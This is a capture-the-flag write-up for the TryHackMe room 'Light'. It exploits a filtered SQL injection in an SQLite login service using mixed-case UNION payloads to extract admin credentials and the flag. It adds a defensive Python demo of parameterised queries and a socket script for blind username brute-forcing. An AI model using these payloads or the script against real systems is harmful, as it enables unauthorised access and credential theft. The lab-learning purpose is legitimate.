| Machine Name | OS | IP Address | Difficulty | 
|---|---|---|---|
| Light | Linux | 10.10.89.204 | Easy | 
What is the admin username?
A service is running on port 1337, and we can interact with it using:
nc 10.10.144.115 1337
Probing the prompt with a few different inputs shows how the service behaves:
└─# nc 10.10.144.115 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: test
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
The error triggered by a single quote (') indicates a SQL injection vulnerability. The leaked fragment also tells us two things about the query: our input is wrapped in single quotes, and the statement ends with LIMIT 30.
Next we want to identify the underlying database management system (DBMS). The room's name, Light, hints at SQLite, and the "unrecognized token" wording is SQLite's own tokenizer error, which supports that guess.
However, certain characters and keywords are restricted:
Please enter your username: --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: UNION
Ahh there is a word in there I don't like :(
Please enter your username: SELECT
Ahh there is a word in there I don't like :(
The blocklist is case-sensitive, while SQL keywords are not: a mixed-case keyword such as UnIoN passes the filter but is still parsed as UNION by SQLite. Using this, we can confirm the SQLite version:
Please enter your username:' UnIoN SeLect sqlite_version() '
Password: 3.31.1
Next, we enumerate the table names:
Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM sqlite_master WHERE type='table
Password: usertable,admintable
| Note: group_concat collapses every matching row into one comma-separated value. This is needed because the service only prints a single value (the "Password:" line), so a multi-row result would otherwise be truncated to its first row.
To enumerate the columns of the admintable:
Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM pragma_table_info('admintable') '
Password: id,username,password
Now we extract all usernames from the admintable:
Please enter your username:' UnIoN SeLect group_concat(username, ',') FROM admintable '
Password: TryHackMeAdmin,flag
✅ The admin username is: TryHackMeAdmin
What is the password to the username mentioned in question 1?
To extract the admin password:
Please enter your username:' UnIoN SeLect password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17
✅ The admin password is: mamZtAuMlrsEy5bp6q17
What is the flag?
We retrieve the value for the flag user:
Please enter your username:' UnIoN SeLect password FROM admintable WHERE username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
✅ Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
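The three weaknesses chained above (an error message that leaks the query shape, a case-sensitive keyword blocklist, and string-concatenated SQL) are easiest to see side by side. The following is an added example, not code from the room, that rebuilds a minimal stand-in for the service's lookup in Python's sqlite3 module: the query shape with its trailing LIMIT 30 is assumed from the leaked error, the table contents are constructed placeholders, and the blocklist is reconstructed from the replies shown. It runs the writeup's own version probe against the concatenated query and against a parameterised one, and shows that the parameterised form treats the payload as an ordinary (non-matching) username.

```python
import sqlite3

# Constructed in-memory stand-in for the room's usertable (schema from the
# enumeration above; the row is a placeholder, not the room's data).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO usertable (username, password) VALUES ('smokey', 'placeholder-pw');
    """)
    return db

def blocklist_ok(user_input):
    # Case-sensitive blocklist reconstructed from the replies: 'UNION' is rejected, 'UnIoN' is not.
    return not any(b in user_input for b in ("/*", "--", "%0b", "UNION", "SELECT"))

def hardened_blocklist_ok(user_input):
    # Case-insensitive check closes the mixed-case gap; still only defence in depth.
    lowered = user_input.lower()
    return not any(b in lowered for b in ("/*", "--", "%0b", "union", "select"))

def lookup_vulnerable(db, user_input):
    # String-concatenated query; the ' LIMIT 30' tail is assumed from the leaked error ("''' LIMIT 30").
    query = f"SELECT password FROM usertable WHERE username = '{user_input}' LIMIT 30"
    row = db.execute(query).fetchone()
    return row[0] if row else None

def lookup_safe(db, user_input):
    # Parameterised query: the input is bound as a value and never parsed as SQL.
    row = db.execute("SELECT password FROM usertable WHERE username = ? LIMIT 30",
                     (user_input,)).fetchone()
    return row[0] if row else None

def demo():
    db = build_db()
    payload = "' UnIoN SeLect sqlite_version() '"  # the version probe from the writeup
    try:
        lookup_vulnerable(db, "'")
        probe_error = None
    except sqlite3.OperationalError as e:
        probe_error = str(e)  # the same "unrecognized token" leak that revealed the query shape
    return {
        "filter_bypassed": blocklist_ok(payload),
        "hardened_filter_blocks": not hardened_blocklist_ok(payload),
        "vulnerable_leaks_version": lookup_vulnerable(db, payload) == sqlite3.sqlite_version,
        "safe_returns_nothing": lookup_safe(db, payload) is None,
        "safe_still_works": lookup_safe(db, "smokey") == "placeholder-pw",
        "probe_error": probe_error,
    }
```

The `probe_error` entry reproduces the exact tokenizer message the room leaked, which is the cue a defender should remove by returning a generic error to the client and logging the detail server-side.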
Enumerating Users via Blind SQL Injection
The following Python script enumerates usernames one character at a time: a LIKE prefix match that comes back with a "Password:" prompt confirms the prefix, and the script then extends it by another character.
import socket
import string
import threading


def bruteforce_username(target_ip, target_port, prefix=""):
    """Try every next character after `prefix`; recurse on each one that matches."""
    alphabet = string.ascii_lowercase
    for char in alphabet:
        attempt = f"{prefix}{char}%"  # LIKE pattern: known prefix, then anything
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((target_ip, target_port))
            s.recv(1024)  # welcome banner
            s.recv(1024)  # "Please enter your username:" prompt
            s.sendall(f"' or username like '{attempt}\n".encode("utf-8"))
            response = s.recv(1024).decode("utf-8")
        # A "Password:" reply means at least one username starts with this prefix;
        # "Username not found." means none does, so the loop just moves on.
        if "Password:" in response:
            print(f"[+] Valid username prefix: {prefix}{char}")
            threading.Thread(
                target=bruteforce_username,
                args=(target_ip, target_port, prefix + char),
            ).start()


if __name__ == "__main__":
    target_ip = "10.10.144.115"
    target_port = 1337
    bruteforce_username(target_ip, target_port)
⚠️ This approach is significantly slower than the UNION-based extraction above, since it opens one connection per guessed character, and should be used as a last resort, i.e. only when results are not echoed back and the injection is blind.
